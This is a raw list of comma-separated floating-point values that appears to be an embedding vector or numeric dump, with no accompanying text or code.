0.005536749958992004, -0.030660653486847878, -0.012044229544699192, -0.03632683306932449, 0.023311875760555267, 0.014769461005926132, 0.01635138876736164, -0.03123589977622032, 0.034198421984910965, -0.008427364751696587, 0.017530646175146103, -0.011986704543232918, 0.007262490689754486, 0.010958450846374035, 0.03270277753472328, -0.02607305906713009, 0.0031656548380851746, 0.010944070294499397, 0.001727537950500846, -0.005910660605877638, -0.02890614978969097, -0.002577824518084526, -0.013813112862408161, -0.005166435148566961, -0.014287691563367844, -0.01144741103053093, -0.0378512367606163, 0.021758709102869034, 0.024807516485452652, 0.0054648444056510925, 0.000646253814920783, 0.02013363689184189, 0.020680122077465057, -0.014359597116708755, -0.006460740230977535, 0.005047790240496397, -0.007089916616678238, 0.005324627738445997, 0.016150053590536118, -0.0023279518354684114, 0.015359088778495789, 0.01990353874862194, 0.008865990675985813, 0.005234745796769857, -0.017300546169281006, 0.016063766553997993, -0.020967744290828705, 0.024102840572595596, -0.007237323559820652, 0.012223994359374046, 0.005576298572123051, -0.006439168471843004, 0.0094915721565485, -0.005374961998313665, 0.013532680459320545, 0.008571176789700985, -0.03347936272621155, -0.013820303604006767, -0.006435573101043701, 0.021284131333231926, -0.020708883181214333, 0.003667198121547699, -0.012590713798999786, 0.013338534161448479, -0.00480690598487854, 0.000282005756162107, 0.010066818445920944, 0.004893193021416664, 0.012964623980224133, 0.04642241448163986, -0.025051996111869812, 0.014582505449652672, 0.006147949956357479, -0.007370349485427141, -0.0010246583260595798, -0.034917477518320084, 0.010663636960089207, 0.004548044875264168, -0.035176340490579605, 0.013475155457854271, 0.010915307328104973, 0.007294848095625639, 0.018997523933649063, -0.006831055507063866, 0.011634365655481815, -0.05039161816239357, 0.030257979407906532, 0.027094123885035515, -0.02302425168454647, 0.02449113130569458, 0.02437608130276203, -0.031005801633000374, 0.012619475834071636, -0.035722825676202774, -0.017401214689016342, 0.0569494292140007, -0.03445728123188019, -0.004914764780551195, -0.03549272567033768, 0.021873759105801582, -0.0094915721565485, -0.024347320199012756, -0.028258997946977615, -0.00419211108237505, 0.028561001643538475, -0.02706536091864109, -0.03503252938389778, -0.035118814557790756, -0.012072991579771042, -0.001132517121732235, -0.007880880497395992, -0.015474137850105762, 0.03350812569260597, 0.008599938824772835, -0.0260299164801836, 0.0006354679353535175, 0.016854729503393173, 0.015301563777029514, 0.008830037899315357, -0.02571353130042553, -0.006410406436771154, -0.01154088880866766, 0.00004996894494979642, -0.027266696095466614, 0.005792016163468361, 0.01156965084373951, -0.045473258942365646, -0.02798575535416603, -0.012482854537665844, 0.0055834888480603695, -0.015876810997724533, 0.018163416534662247, 0.011346742510795593, -0.01940019801259041, -0.030401792377233505, 0.007701116148382425, 0.023426923900842667, -0.0016727097099646926, 0.015891192480921745, 0.0035863041412085295, -0.0026191703509539366, -0.022981109097599983, 0.014927653595805168, -0.0054828207939863205, -0.018968762829899788, -0.016452057287096977, -0.008801275864243507, -0.008355459198355675, -0.0043035647831857204, -0.013281010091304779, 0.02326873131096363, 0.007607638370245695, 0.015315945260226727, 0.02546905167400837, 0.00408784719184041, -0.01719987764954567, 0.016667775809764862, -0.009318998083472252, -0.016567107290029526, -0.012813622131943703, 0.003606078214943409, 0.008010311052203178, 0.009376522153615952, 0.021197844296693802, 0.0013994675828143954, -0.014129498973488808, -0.025943629443645477, 0.05168592184782028, 0.003127904376015067, -0.018393514677882195, -0.005126887001097202, 0.0038074145559221506, -0.015632331371307373, -0.01843665912747383, 0.007021605968475342, 0.031437236815690994, 0.02172994613647461, -0.0003909880470018834, -0.005881898105144501, 0.013424821197986603, -0.003796628676354885, 0.01836475357413292, 0.004893193021416664, -0.015574806369841099, -0.010879354551434517, 0.0054828207939863205, 0.023800835013389587, 0.00985829159617424, -0.04299969598650932, -0.012684191577136517, -0.03865658491849899, -0.025210190564393997, 0.0037642710376530886, 0.021787472069263458, 0.018019605427980423, -0.03992212563753128, 0.0055403453297913074, 0.0056230369955301285, 0.010282536037266254, 0.013345724903047085, -0.0082404101267457, 0.007420683279633522, -0.011684699915349483, -0.0024933351669460535, -0.014884510077536106, 0.0023836789187043905, 0.00908889900892973, -0.00526710320264101, -0.02405969612300396, 0.027324222028255463, -0.0015774344792589545, -0.008233219385147095, -0.016754062846302986, 0.015819286927580833, -0.022679103538393974, -0.009556286968290806, -0.012935861945152283, 0.00323756062425673, 0.009901435114443302, -0.025943629443645477, -0.0027971374802291393, -0.014683173969388008, 0.009987722150981426, -0.01584804803133011, -0.0005896279471926391, 0.009750432334840298, 0.034917477518320084, 0.017358072102069855, -0.02198880724608898, -0.023987790569663048, -0.009635383263230324, -0.0012529593659564853, 0.006133568473160267, -0.008945086970925331, 0.020967744290828705, -0.004699047189205885, 0.006877794396132231, 0.027468033134937286, -0.0067843166179955006, -0.023182444274425507, 0.007442255038768053, -0.009009802713990211, -0.025641625747084618, 0.02687840536236763, 0.015589187853038311, 0.00942685641348362, 0.004799715243279934, -0.016380151733756065, 0.007384730502963066, -0.006273785140365362, -0.020795170217752457, -0.0004314350662752986, -0.011684699915349483, -0.021773090586066246, -0.029855307191610336, -0.01227432768791914, -0.015200896188616753, -0.0013994675828143954, 0.017545025795698166, -0.015387850813567638, 0.0119076082482934, 0.011957942508161068, 0.004709832835942507, 0.01604938507080078, 0.0021427941974252462, -0.03201248124241829, -0.011238884180784225, -0.015517281368374825, 0.02216138131916523, -0.05815744772553444, 0.006439168471843004, -0.042453210800886154, -0.016969779506325722, 0.008326697163283825, -0.00486802589148283, 0.016552725806832314, 0.016308246180415154, -0.00697846245020628, 0.029653972014784813, -0.013475155457854271, -0.008930706419050694, 0.004098633304238319, -0.021197844296693802, 0.03747732564806938, -0.006241427268832922, 0.034428518265485764, 0.00027391634648665786, -0.017990842461586, -0.01768883876502514, 0.015876810997724533, 0.008276362903416157, 0.0006709714070893824, -0.03448604419827461, -0.020651359111070633, -0.008772512897849083, 0.027396127581596375, -0.028863007202744484, 0.009412474930286407, 0.0023333446588367224, -0.02847471460700035, -0.03396832197904587, -0.027453651651740074, -0.01205861009657383, -0.036154258996248245, 0.0008453431073576212, 0.010325679555535316, -0.01349672768265009, -0.004796119872480631, -0.003372384235262871, 0.006582980044186115, 0.015589187853038311, -0.025756673887372017, -0.004382661543786526, 0.007107893005013466, -0.004447376821190119, 0.008470508269965649, -0.02050754800438881, 0.029653972014784813, 0.0030002715066075325, 0.002973306691274047, -0.004400637932121754, 0.0015369874890893698, 0.02062259614467621, -0.00850646197795868, 0.021773090586066246, -0.012439711019396782, -0.024088459089398384, 0.00988705363124609, 0.01041196659207344, -0.008578367531299591, -0.018278466537594795, 0.018753044307231903, 0.010483872145414352, 0.01579052396118641, -0.014352407306432724, 0.02362826094031334, -0.006183902733027935, -0.020795170217752457, -0.03963450342416763, 0.020162399858236313, -0.03043055348098278, -0.022132620215415955, -0.0017473120242357254, 0.022995490580797195, -0.01111664343625307, -0.016452057287096977, -0.0033795747440308332, -0.0037642710376530886, -0.007643591612577438, 0.009326187893748283, -0.008154123090207577, 0.0018362955888733268, -0.02644697017967701, 0.01239656750112772, -0.003994369879364967, 0.04115890711545944, 0.0066584814339876175, -0.016437675803899765, 0.004756571725010872, 0.005090933758765459, -0.02039249800145626, 0.015028322115540504, 0.005428891628980637, -0.005899874493479729, -0.02541152574121952, 0.018048368394374847, -0.015229658223688602, -0.001054319436661899, -0.014985178597271442, -0.0259723924100399, 0.01007400918751955, 0.010785876773297787, -0.0031099277548491955, 0.031811147928237915, 0.031092088669538498, -0.02595801092684269, -0.023182444274425507, 0.02290920354425907, -0.01684034988284111, 0.03091951459646225, -0.006406811065971851, -0.03787999972701073, -0.008542414754629135, 0.007028796710073948, -0.002611979842185974, -0.004379066172987223, -0.014158261008560658, -0.035665299743413925, 0.007722687907516956, 0.0089378971606493, -0.005177220795303583, 0.006593766156584024, 0.015546044334769249, -0.022333955392241478, -0.019975444301962852, -0.023096157237887383, -0.01819217950105667, -0.005227555055171251, 0.004116609692573547, 0.00015673227608203888, 0.08651711791753769, 0.000785121985245496, -0.013072483241558075, -0.008686225861310959, -0.013115626759827137, 0.0164808202534914, -0.01886809431016445, 0.003415527753531933, -0.007309229113161564, 0.020104873925447464, 0.03647064417600632, -0.001600803923793137, 0.018134653568267822, 0.01879618875682354, 0.0018066343618556857, -0.012518808245658875, -0.00026627632905729115, -0.001583726261742413, 0.0065146698616445065, -0.005137672647833824, 0.010117152705788612, 0.0038757252041250467, -0.002746803220361471, -0.024879422038793564, 0.0429709330201149, -0.007208561059087515, -0.014740698970854282, -0.0035521488171070814, -0.03724722936749458, -0.010929688811302185, -0.017185498028993607, -0.026590781286358833, -0.010829020291566849, -0.002856459701433778, -0.001137011218816042, -0.002439405769109726, 0.02939511090517044, -0.002108638873323798, -0.011799748986959457, 0.0037211275193840265, -0.003735508769750595, -0.020536309108138084, -0.008017501793801785, 0.0017455144552513957, -0.009362141601741314, -0.008060645312070847, 0.024821897968649864, -0.018522946164011955, -0.00976481381803751, 0.01940019801259041, -0.014596886932849884, -0.02388712204992771, 0.010584540665149689, 0.007435064297169447, -0.005989756900817156, 0.023858359083533287, 0.010692398995161057, 0.011612794362008572, 0.015819286927580833, 0.0044293999671936035, -0.02112593688070774, 0.007086321245878935, -0.010275345295667648, -0.0006228843703866005, 0.007765831425786018, -0.024275414645671844, -0.014194213785231113, 0.005669775884598494, -0.0450705848634243, 0.04348865523934364, 0.02821585349738598, 0.001753603806719184, -0.02180185355246067, -0.009283044375479221, 0.010469491593539715, 0.03986459970474243, 0.005745277274399996, 0.01019624900072813, -0.003415527753531933, -0.01448183786123991, 0.021025270223617554, 0.03304792568087578, -0.010541397146880627, 0.022434623911976814, -0.008182885125279427, 0.012669810093939304, 0.002550859935581684, -0.02093898318707943, -0.006496693007647991, -0.0034442900214344263, 0.016984160989522934, -0.01971658319234848, 0.02161489799618721, -0.01499955914914608, 0.022333955392241478, 0.045473258942365646, 0.009966149926185608, -0.022794153541326523, -0.0015324933920055628, 0.01007400918751955, -0.00862870179116726, -0.0004619950777851045, 0.013590204529464245, -0.010936879552900791, -0.021039649844169617, -0.0018300038063898683, -0.004903978668153286, 0.03828267380595207, -0.026533257216215134, -0.0018237120239064097, -0.04268331080675125, -0.022362718358635902, 0.024893803521990776, -0.0354064404964447, 0.000923990155570209, 0.019558390602469444, 0.02069450169801712, 0.003002069192007184, -0.015718618407845497, -0.023585118353366852, -0.024462368339300156, -0.012748906388878822, 0.03428470715880394, -0.0008848913130350411, 0.016825968399643898, 0.01193637028336525, 0.014136689715087414, -0.023714547976851463, 0.02834528498351574, 0.009441237896680832, 0.032674018293619156, -0.008254791609942913, 0.017228640615940094, -0.00443659070879221, 0.018292848020792007, -0.01521527674049139, 0.012281518429517746, -0.011555269360542297, -0.028690433129668236, 0.009879862889647484, -0.021399179473519325, 0.008952277712523937, 0.02994159422814846, -0.01891123689711094, 0.0069029610604047775, 0.0022973918821662664, -0.009714479558169842, -0.009807957336306572, -0.005116100888699293, 0.012561951763927937, -0.012202422134578228, -0.02099650725722313, 0.00771549716591835, 0.03770742565393448, -0.00734877772629261, 0.009685717523097992, 0.03060312755405903, -0.015445375815033913, 0.0035575416404753923, -0.008808466605842113, -0.0016304650343954563, 0.0016915850574150681, -0.0010615100618451834, -0.0010606112191453576, 0.008880372159183025, 0.029826544225215912, 0.019256385043263435, -0.004886002279818058, -0.02956768497824669, -0.0026173728983849287, 0.0226503424346447, 0.03485995531082153, -0.010376013815402985, 0.0012286911951377988, 0.060458436608314514, 0.004961503203958273, -0.03396832197904587, 0.01221680361777544, 0.010203439742326736, -0.00851365178823471, 0.0006777126109227538, 0.011641556397080421, 0.009541905485093594, 0.01922762393951416, 0.00323756062425673, -0.02761184424161911, 0.01298619620501995, 0.011440220288932323, -0.03304792568087578, 0.017041685059666634, 0.004972289316356182, 0.029740257188677788, -0.019428959116339684, -0.03264525532722473, 0.003198012476786971, -0.02339816279709339, 0.013856256380677223, -0.008420174941420555, 0.0010246583260595798, 0.005669775884598494, -0.010189058259129524, 0.009376522153615952, 0.010980023071169853, -0.005720110144466162, -0.007550113834440708, -0.03655693307518959, -0.0065973615273833275, -0.01518651470541954, -0.01395692490041256, -0.02357073687016964, 0.0031782384030520916, 0.006018519401550293, 0.0004619950777851045, 0.006906556431204081, 0.0032249772921204567, 0.0053390092216432095, -0.024462368339300156, -0.0028582573868334293, -0.02007611282169819, -0.006288166157901287, -0.008226028643548489, 0.014007259160280228, 0.0006165926461108029, 0.023915885016322136, 0.0023189636413007975, 0.011174168437719345, 0.019817251712083817, -0.011087881401181221, 0.006626123562455177, 0.012324661947786808, -0.028445953503251076, 0.014280500821769238, 0.022679103538393974, 0.022578435018658638, -0.002737815026193857, -0.02815832942724228, -0.016926636919379234, 0.00019650519243441522, -0.0068022930063307285, 0.007312824483960867, -0.015905573964118958, -0.012849574908614159, -0.009412474930286407, 0.0007244513835757971, -0.008894753642380238, -0.000249423406785354, 0.012756097130477428, 0.008168504573404789, -0.01837913505733013, 0.005335413850843906, 0.005065767094492912, 0.006126378197222948, 0.0042244684882462025, 0.006388834677636623, -0.008197266608476639, 0.01732930913567543, 0.006982057821005583, -0.0009091595420613885, 0.031264662742614746, -0.015948716551065445, 0.012856765650212765, -0.013640538789331913, -0.004418614320456982, 0.005392938386648893, -0.010368823073804379, 0.024534273892641068, 0.011073499917984009, 0.011339551769196987, 0.02951015904545784, -0.004717023577541113, -0.0011019570520147681, -0.007035986986011267, 0.0005195197300054133, -0.0248650424182415, 0.0006678255740553141, -0.002939151367172599, 0.005993352271616459, -0.005716514773666859, 0.00638523930683732, -0.002139198826625943, 0.0035791133996099234, 0.031868670135736465, 0.005745277274399996, -0.028143947944045067, -0.0285897646099329, 0.0006359173567034304, -0.022751009091734886, -0.002477156464010477, -0.00453006848692894, -0.00945561844855547, -0.003077570116147399, -0.0028744363225996494, 0.000026810206691152416, -0.018709901720285416, -0.006367262918502092, 0.002396262250840664, -0.029481397941708565, 0.0333067886531353, -0.023800835013389587, -0.022995490580797195, 0.009462809190154076, -0.006338500417768955, 0.040324799716472626, 0.021643659099936485, -0.0042028967291116714, 0.009800766594707966, -0.002047518966719508, -0.012971814721822739, -0.021154699847102165, 0.0003748092276509851, 0.009448428638279438, 0.002489740028977394, -0.03201248124241829, -0.020737646147608757, -0.01026096474379301, -0.0024843469727784395, 0.015114609152078629, -0.0026892786845564842, 0.004357494413852692, -0.019299529492855072, 0.015085846185684204, -0.020277447998523712, -0.03215629607439041, -0.015172133222222328, -0.0011864465195685625, 0.008858799934387207, 0.00988705363124609, -0.008592749014496803, -0.025512194260954857, -0.019126955419778824, 0.03500376641750336, 0.032530203461647034, 0.02313930168747902, -0.011346742510795593, 0.002599396277219057, -0.009635383263230324, 0.02013363689184189, -0.011864464730024338, -0.0004673879884649068, 0.0050513856112957, -0.029438253492116928, 0.03336431458592415, -0.011454601772129536, 0.010800258256494999, 0.029294442385435104, 0.018882475793361664, 0.0167684443295002, -0.012015466578304768, 0.0042676120065152645, -0.025929247960448265, -0.0007500678766518831, -0.0015199098270386457, -0.008276362903416157, 0.036815792322158813, 0.002004375448450446, 0.022060712799429893, 0.010728352703154087, -0.014898891560733318, 0.007938405498862267, -0.04328731819987297, -0.0007181596592999995, -0.02835966646671295, -0.0042855883948504925, -0.022003188729286194, 0.026705831289291382, -0.0011316182790324092, -0.017099210992455482, 0.03221381828188896, 0.008563986048102379, -0.011123834177851677, 0.009599430486559868, 0.015114609152078629, 0.00887318141758442, -0.0016727097099646926, -0.02101088874042034, 0.003118916181847453, 0.025195809081196785, 0.0025796222034841776, -0.02172994613647461, 0.017731981351971626, 0.021226605400443077, -0.0014704745262861252, -0.012173660099506378, 0.005871112458407879, -0.005396533757448196, -0.001176559366285801, -0.01629386469721794, 0.028618527576327324, -0.011986704543232918, 0.008420174941420555, -0.0067843166179955006, 0.01475507952272892, 0.021960046142339706, 0.028187092393636703, 0.010980023071169853, -0.0005114303203299642, 0.006543431896716356, 0.021816233173012733, -0.01794769987463951, -0.017904555425047874, -0.002399857621639967, 0.02210385724902153, 0.006787911988794804, 0.017458738759160042, 0.02479313500225544, 0.00710070226341486, 0.010282536037266254, -0.0020403284579515457, 0.01873866282403469, -0.0001590916799614206, 0.0027126481290906668, -0.008420174941420555, -0.006298952270299196, -0.024563036859035492, -0.02106841281056404, -0.0014569922350347042, 0.001367109944112599, 0.02290920354425907, -0.012166469357907772, 0.014798223040997982, -0.0165383443236351, 0.0013293593656271696, -0.045271921902894974, -0.036585696041584015, 0.008786894381046295, -0.030516840517520905, 0.0034964217338711023, -0.02368578501045704, 0.018839331343770027, 0.006011328659951687, 0.012044229544699192, 0.014740698970854282, 0.004044703673571348, 0.002842078683897853, -0.013432011939585209, 0.010002103634178638, -0.005766849033534527, -0.006022114772349596, -0.015445375815033913, 0.032357629388570786, 0.013662111014127731, -0.02509514056146145, -0.01414388045668602, -0.0002622316242195666, -0.01591995358467102, -0.005019028205424547, -0.013187532313168049, -0.005134077277034521, -0.006751959212124348, -0.012037038803100586, 0.015013940632343292, 0.02779879979789257, -0.002455584704875946, 0.018019605427980423, -0.01200108602643013, 0.005507987923920155, -0.008211648091673851, 0.003205203218385577, -0.008405793458223343, 0.005101719871163368, 0.00811817031353712, 0.0066764578223228455, 0.01623634062707424, 0.002291998825967312, 0.022449005395174026, 0.000477275054436177, -0.004177729599177837, 0.018033986911177635, 0.0067555541172623634, -0.03601044788956642, 0.02364264242351055, 0.018091510981321335, 0.004950717557221651, 0.012979005463421345, -0.0005276091396808624, -0.02039249800145626, -0.009196757338941097, -0.019745346158742905, 0.016926636919379234, -0.007967167533934116, -0.011677509173750877, 0.005651799496263266, 0.010929688811302185, 0.005910660605877638, -0.0004781738680321723, 0.0335368886590004, 0.01279924064874649, 0.007650781888514757, 0.0077945939265191555, -0.0026353492867201567, 0.007830546237528324, 0.011468982324004173, -0.005529559683054686, -0.007657972630113363, -0.0067843166179955006, 0.010649255476891994, 0.011123834177851677, 0.01580490544438362, 0.019270766526460648, -0.023124920204281807, -0.0068634129129350185, -0.019615914672613144, 0.013302581384778023, 0.001605298020876944, 0.01000929344445467, -0.015934335067868233, -0.009002611972391605, 0.011440220288932323, 0.0014605874894186854, -0.006572194397449493, 0.0018461826257407665, -0.01349672768265009, 0.0021841400302946568, -0.00697846245020628, 0.019788488745689392, 0.002908591413870454, -0.0054828207939863205, 0.005170030519366264, -0.011641556397080421, 0.003323847660794854, 0.00039638098678551614, 0.005306651350110769, -0.012303090654313564, -0.008837228640913963, -0.009944578632712364, -0.0043718754313886166, -0.00029571278719231486, 0.024174746125936508, -0.014870128594338894, -0.003097344422712922, 0.01928514800965786, -0.003882915712893009, -0.007780212443321943, 0.017775125801563263, -0.010857783257961273, 0.006115592084825039, -0.0026353492867201567, -0.004235254134982824, -0.003455075901001692, -0.006331309676170349, -0.0017212461680173874, 0.004993861075490713, 0.020593835040926933, -0.0038937015924602747, -0.0017284367932006717, -0.00526710320264101, -0.00018661814101506025, -0.004256825894117355, -0.01282800268381834, -0.0002178522408939898, 0.015172133222222328, -0.00014785639359615743, -0.0003532374685164541, -0.0010642064735293388, 0.004573212005198002, -0.003402944188565016, 0.009994912892580032, -0.0005244632484391332, 0.001262846402823925, 0.01289271842688322, -0.010606111958622932, 0.02037811651825905, 0.015172133222222328, -0.008815656416118145, 0.013230675831437111, 0.01964467763900757, 0.01497079711407423, 0.011986704543232918, 0.01184289250522852, -0.017214259132742882, 0.012964623980224133, 0.010296917520463467, 0.013388868421316147, -0.005756062921136618, -0.024965709075331688, 0.003814605064690113, -0.009326187893748283, -0.026159346103668213, -0.003987179137766361, -0.011224502697587013, 0.01763131283223629, -0.009067326784133911, -0.007204965688288212, -0.007571685593575239, -0.009196757338941097, -0.01451059989631176, -0.00492914579808712, -0.007215751800686121, -0.02033497393131256, -0.015646712854504585, 0.00771549716591835, 0.020550690591335297, -0.01819217950105667, 0.015200896188616753, -0.020723264664411545, -0.01750188320875168, 0.0018255097093060613, -0.02651887573301792, 0.012116135098040104, 0.0190406683832407, -0.02300987020134926, 0.010836211033165455, 0.0008075925288721919, -0.01338167767971754, 0.008067836053669453, 0.004044703673571348, 0.039088018238544464, 0.011425838805735111, 0.0023027847055345774, -0.021643659099936485, -0.01855170913040638, -0.009311807341873646, 0.001219702884554863, 0.0041669439524412155, 0.0033921583089977503, -0.013676491566002369, 0.001172065269201994, 0.015272801741957664, -0.02037811651825905, -0.028201473876833916, 0.014913272112607956, 0.007420683279633522, -0.02339816279709339, 0.007442255038768053, 0.017358072102069855, 0.008003120310604572, 0.012015466578304768, -0.014668792486190796, 0.015488519333302975, -0.004073466174304485, 0.015085846185684204, 0.01202984806150198, -0.014582505449652672, 0.006284570787101984, -0.01891123689711094, 0.018968762829899788, -0.008456127718091011, -0.012353423982858658, 0.009958960115909576, -0.017185498028993607, -0.01727178506553173, -0.012525998055934906, -0.0012646440882235765, -0.004810501355677843, 0.002283010631799698, -0.01304372027516365, 0.011296408250927925, 0.001830902649089694, 0.004012346267700195, 0.0019360649166628718, -0.00323756062425673, 0.03439975529909134, 0.0014480040408670902, 0.025555338710546494, 0.0001089261204469949, -0.02607305906713009, 0.0008956771926023066, -0.0004678374098148197, -0.0017068650340661407, 0.01463283970952034, 0.010951260104775429, 0.017832649871706963, 0.005871112458407879, -0.0033993488177657127, 0.013611776754260063, 0.016639012843370438, -0.0018147238297387958, 0.008398602716624737, 0.016121290624141693, 0.00759325735270977, 0.001982803689315915, 0.012763287872076035, -0.0011271241819486022, 0.0037858427967876196, 0.0026479328516870737, -0.00492914579808712, -0.002178747206926346, -0.0008817454217933118, -0.027899468317627907, -0.003406539559364319, -0.002989485627040267, 0.00817569438368082, -0.016250722110271454, -0.004555235151201487, 0.008039074018597603, -0.036211784929037094, -0.009570668451488018, -0.003793033305555582, 0.011727843433618546, -0.00036716923932544887, 0.02229081280529499, -0.007251704577356577, 0.008096598088741302, -0.0025526576209813356, -0.012533188797533512, -0.04012346267700195, -0.007363158743828535, 0.004864430520683527, 0.004645117558538914, 0.008923515677452087, -0.005806397181004286, -0.014280500821769238, 0.010541397146880627, -0.010678018443286419, 0.00998053140938282, 0.0010695994133129716, 0.010879354551434517, -0.024088459089398384, -0.0065362416207790375, -0.024505512788891792, 0.012856765650212765, -0.0067016249522566795, 0.006489502731710672, -0.015819286927580833, 0.008578367531299591, 0.011555269360542297, 0.00492914579808712, -0.012806431390345097, 0.013942543417215347, -0.005658990237861872, -0.0017994438530877233, 0.022420242428779602, 0.011706272140145302, -0.011195740662515163, -0.0027234340086579323, 0.021269749850034714, -0.015229658223688602, -0.0249225664883852, -0.009994912892580032, -0.01200108602643013, 0.016912255436182022, 0.006712410598993301, 0.010577349923551083, 0.00995176937431097, -0.000027287707780487835, -0.013885019347071648, -0.004447376821190119, 0.020104873925447464, -0.005698538385331631, 0.0016322627197951078, 0.026288777589797974, 0.0016933827428147197, -0.0016214768402278423, 0.0047745481133461, 0.0021535800769925117, -0.001358121633529663, -0.0052994610741734505, 0.018997523933649063, -0.008599938824772835, 0.028747957199811935, -0.010670827701687813, 0.00018976401770487428, -0.009376522153615952, 0.02601553499698639, 0.012166469357907772, -0.019313910976052284, 0.012072991579771042, -0.002568836323916912, 0.006388834677636623, -0.0042028967291116714, 0.01597747951745987, 0.002078078920021653, 0.0008138843113556504, 0.02039249800145626, -0.008686225861310959, 0.016121290624141693, 0.016883492469787598, -0.016926636919379234, 0.00008325348608195782, -0.005259912461042404, -0.003537767566740513, -0.00995176937431097, 0.02137041836977005, -0.0007069243583828211, 0.003025438403710723, -0.011461791582405567, 0.01812027394771576, -0.014683173969388008, -0.0067231967113912106, -0.002417834009975195, 0.01414388045668602, 0.005252722185105085, -0.015315945260226727, -0.012037038803100586, 0.008945086970925331, 0.014568124897778034, -0.008664654567837715, -0.008254791609942913, -0.0040411087684333324, -0.00009078113362193108, 0.00036941628786735237, 0.009347760118544102, 0.002716243267059326, 0.0006974866846576333, 0.008650273084640503, 0.007535732816904783, -0.0056769666261971, 0.021888140588998795, -0.003171047894284129, -0.016265101730823517, -0.0033615983556956053, -0.03207000717520714, -0.013460774905979633, 0.0012547570513561368, 0.010527015663683414, 0.028431572020053864, 0.022146999835968018, 0.007787403184920549, -0.012971814721822739, -0.018709901720285416, -0.005080148112028837, 0.01629386469721794, -0.037074655294418335, 0.004921955056488514, -0.02815832942724228, -0.012418139725923538, -0.003814605064690113, 0.016509583219885826, 0.03954821452498436, -0.004907574038952589, -0.0015199098270386457, -0.003375979606062174, 0.006733982358127832, -0.021873759105801582, -0.006421192083507776, -0.006769935600459576, 0.009901435114443302, 0.0034604689572006464, -0.008283553645014763, 0.0017814673483371735, -0.004634331911802292, -0.0053857481107115746, -0.0014821592485532165, -0.017918936908245087, -0.021542992442846298, -0.00021313341858331114, -0.0005887291044928133, -0.01714235357940197, -0.019544009119272232, 0.023297494277358055, -0.01053420640528202, -0.012741715647280216, -0.0054828207939863205, 0.00018998872837983072, 0.024649323895573616, 0.0015900180442258716, -0.013302581384778023, -0.013992877677083015, 0.00122419698163867, -0.024261033162474632, 0.004752976354211569, 0.010002103634178638, 0.020550690591335297, -0.00004235703818267211, -0.00008117495599435642, -0.01586242951452732, -0.008060645312070847, -0.016610249876976013, -0.011612794362008572, 0.002520299982279539, 0.010052436962723732, -0.012382186949253082, 0.022794153541326523, -0.03534891456365585, -0.011921989731490612, -0.0034874335397034883, -0.01034725084900856, 0.0014938439708203077, -0.010936879552900791, -0.0014201404992491007, -0.0011397076305001974, -0.009225520305335522, 0.02210385724902153, 0.023053014650940895, 0.015258420258760452, 0.008786894381046295, -0.03661445528268814, -0.008254791609942913, -0.014287691563367844, 0.004281993024051189, 0.024706847965717316, 0.0012610488338395953, 0.013432011939585209, -0.007269680965691805, 0.01209456380456686, -0.019917920231819153, -0.005863921716809273, 0.01166312862187624, -0.030574366450309753, -0.02890614978969097, -0.005536749958992004, 0.00961381196975708, -0.008621511049568653, 0.027410509064793587, 0.026130584999918938, 0.010498253628611565, 0.0038757252041250467, 0.0043646846897900105, 0.006216260604560375, 0.02590048499405384, 0.012374996207654476, -0.014489027671515942, 0.014582505449652672, 0.011921989731490612, -0.004968693945556879, 0.008585558272898197, 0.0021212224382907152, -0.012698572129011154, -0.019026286900043488, 0.004986670333892107, -0.002768374979496002, 0.006582980044186115, -0.003393955994397402, 0.0026317539159208536, 0.017401214689016342, -0.010857783257961273, -0.014927653595805168, -0.008412984199821949, -0.006183902733027935, 0.00007432143320329487, -0.0003952574625145644, 0.019385816529393196, -0.0011882440885528922, -0.0011567852925509214, 0.007320015225559473, -0.01383468508720398, -0.008607129566371441, 0.0029265680350363255, 0.012763287872076035, -0.00020729107200168073, -0.010109961964190006, 0.00031998101621866226, 0.00930461660027504, 0.003710341639816761, -0.039461929351091385, -0.00492914579808712, -0.0028115184977650642, -0.029740257188677788, -0.021442323923110962, -0.004037513397634029, -0.013086863793432713, -0.0010003900388255715, -0.018451040610671043, -0.013647729530930519, -0.008477699011564255, -0.01126045547425747, -0.004566021263599396, -0.007334396243095398, -0.018997523933649063, 0.012792049907147884, 0.004580402281135321, 0.011166977696120739, -0.003606078214943409, 0.008161313831806183, -0.01971658319234848, 0.007302038837224245, -0.012267136946320534, 0.009822338819503784, 0.034629855304956436, -0.035176340490579605, -0.010246583260595798, 0.01074992399662733, 0.019730964675545692, 0.007420683279633522, 0.007801784202456474, -0.004763762466609478, -0.008405793458223343, -0.02430417574942112, -0.012310280464589596, 0.024419225752353668, -0.013734016567468643, -0.01597747951745987, 0.0013032935094088316, -0.004447376821190119, -0.0034442900214344263, -0.009901435114443302, -0.02216138131916523, -0.008650273084640503, -0.0000752202540752478, 0.009513143450021744, -0.0028708409518003464, 0.008571176789700985, -0.009009802713990211, -0.019615914672613144, -0.014395550824701786, -0.0036132687237113714, -0.0055655124597251415, 0.006877794396132231, 0.008369840681552887, -0.009081708267331123, -0.0017742767231538892, -0.013734016567468643, 0.027381746098399162, 0.004044703673571348, -0.003140487940981984, -0.001605298020876944, 0.017918936908245087, -0.0028115184977650642, -0.0001640352129470557, -0.012065800838172436, -0.010541397146880627, 0.008743750862777233, 0.0014947428135201335, 0.01292148046195507, 0.002469965722411871, -0.004447376821190119, -0.018709901720285416, -0.0056050606071949005, -0.03218505531549454, 0.015560424886643887, 0.0034083370119333267, 0.02913624979555607, -0.019443340599536896, 0.008261981420218945, 0.007492589298635721, 0.006705220323055983, -0.01719987764954567, 0.003154868958517909, 0.003645626362413168, -0.015574806369841099, -0.0055619170889258385, 0.01597747951745987, -0.0029930807650089264, -0.0226503424346447, -0.022492147982120514, 0.014524981379508972, -0.0020672930404543877, -0.02216138131916523, 0.004645117558538914, -0.005245531443506479, 0.017113590613007545, -0.00384336756542325, 0.009750432334840298, 0.000980615965090692, 0.008017501793801785, 0.000785571348387748, -0.0002829045697581023, 0.004914764780551195, 0.007952786982059479, 0.007305634208023548, -0.005594274960458279, -0.00731641985476017, -0.014028830453753471, 0.029179392382502556, 0.0077298786491155624, -0.0023405354004353285, -0.0014551945496350527, 0.023182444274425507, 0.0038469627033919096, 0.009685717523097992, 0.00641400134190917, 0.008067836053669453, -0.01819217950105667, -0.03221381828188896, -0.01911257393658161, 0.003918868489563465, 0.011512125842273235, 0.0020834719762206078, -0.013935352675616741, 0.011289217509329319, -0.00577044440433383, 0.004048299044370651, 0.00641400134190917, -0.009132042527198792, 0.013273819349706173, -0.002998473821207881, -0.007629210129380226, -0.002489740028977394, -0.018077129498124123, 0.012518808245658875, -0.0030344268307089806, 0.01627948321402073, -0.003118916181847453, 0.023283112794160843, 0.02063697762787342, -0.005993352271616459, 